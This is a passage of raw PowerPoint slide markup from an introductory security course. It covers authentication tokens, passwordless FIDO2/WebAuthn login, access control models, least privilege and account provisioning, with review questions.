              <a:t>A hard authentication token is generated within a secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. The authentication design means that there is no transmission of the token itself. Several device-based authenticators can be used to implement hard tokens:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Smart cards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>One-time password (OTP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Security key</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 250">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438F6C03-E33B-5C18-FC72-A13434E10139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6723743" y="2249486"/>
            <a:ext cx="4875213" cy="2970689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29140417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9B15-5272-C6FB-9373-9D7F100FFC5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Soft Authentication Tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9269DE3C-B8EF-F089-2B42-C8A803008C5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A soft authentication token is a one-time password generated by the identity provider and transmitted to the supplicant. The OTP could be sent to a registered phone number as an SMS/text message or sent to an email account. This method is more likely to use counter-based tokens, though they will still have an expiry period.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 253">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6969F11C-AC80-39D4-A010-05304EE77312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6636657" y="2589051"/>
            <a:ext cx="4875213" cy="2282014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3361494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15CB9-91C0-CC93-85CF-3ADECC623AC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REVIEW ACTIVITY : SECURITY CONCEPT</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F33B430-73F0-C1A4-EF79-F0A6DC3BB74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>What are the properties of a secure information processing system?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>What term is used to describe the property of a secure network where a sender cannot deny having sent a message?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>A company provides a statement of deviations from framework best</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>practices to a regulator. What process has the company performed?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>What process within an access control framework logs actions performed by subjects?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>What is the difference between authorization and authentication?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>How does accounting provide non-repudiation?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15199510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737B1-B90F-2A38-1CC3-FACB1892AF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="0"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09A99706-A4F6-4903-43F2-D2E441EFD034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783771" y="1146630"/>
            <a:ext cx="10755085" cy="5965370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> means that the whole authentication system no longer processes knowledge-based factors. The FIDO2 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>WebAuthn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> specifications provides a framework for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> authentication. It works basically as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The user chooses either a roaming authenticator, such as a security key, or a platform authenticator implemented by the device OS, such as Windows Hello or Face ID/Touch ID for macOS and iOS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The user configures a secure method or local gesture to confirm presence and authenticates the device. This gesture could be a fingerprint, face recognition, or PIN. This credential is only ever validated locally by the authenticator.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The user registers with a web application or service, referred to as a relying party. For each new relying party, the authenticator generates a public/ private key pair. The user’s client browser obtains the public key from the authenticator and registers it to associate it with an account on the relying party.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>When presented with an authentication challenge, the user performs the local gesture to unlock the private key. The private key is used to sign a confirmation that the local gesture worked, which is then sent to the relying party.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The relying party uses the public key to verify the signature and authenticate the account session.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34607794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1AD93-2E7C-0808-034F-87FF523AFB27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Review Activity: Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317BE4A8-F481-6AB7-0CE6-CA9DA5393212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1654628"/>
            <a:ext cx="9905999" cy="4775201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Which property of a plaintext password is most effective at defeating a brute force attack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A user maintains a list of commonly used passwords in a file located deep within the computer’s directory structure. Is this secure password management?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>What policy prevents users from choosing old passwords again?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>True or false? An account requiring a password, PIN, and smart card is an example of three-factor authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>What methods can be used to implement location-based authentication?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Apart from cost, what would you consider to be the major considerations for evaluating a biometric recognition technology?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>True or false? When implementing smart card login, the user’s private key is stored on the smart card.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>How does OTP protect against password compromise?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27704746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954D6-A31A-2BC3-755A-826F988D37D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Topic 4B - Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3578197C-3540-83E5-A4E5-E678FD91BEFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A user account that has been authenticated can be allocated rights and permissions on networks, computers, and data. An access control model describes the principles that govern how users receive rights.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Discretionary Access Control (DAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Mandatory Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15031560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CAD87-19CF-F32E-90AA-2B833F032B7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Role- and Attribute-Based Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F23F49-C99D-632D-C1F4-1AC4A82060B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024126" y="2286000"/>
            <a:ext cx="5071873" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Role- and attribute-based access control use nondiscretionary, rules-based permissions assignments with more flexibility than MAC.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Role-Based Access Control (RBAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attribute-Based Access Control (ABAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Rule-Based Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 273">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2EC8219-6E4F-3992-98C9-8997C2FDBDB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095999" y="2084832"/>
            <a:ext cx="5660572" cy="4410795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39663723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E500-944A-AAE4-3F9A-4DE7EA676A87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Least Privilege Permission Assignments</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="4400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 274">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2492ADA-C585-E1CF-7CFC-3011AF895749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154246" y="1663811"/>
            <a:ext cx="6772040" cy="5070817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8292541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52B47-6D4D-444D-A727-612ACAA465F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>User Account Provisioning</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DBB2535-AF24-5A34-CA86-ADBBABFF1D9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provisioning a user account involves the following general steps:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Identity Proofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Issuing Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
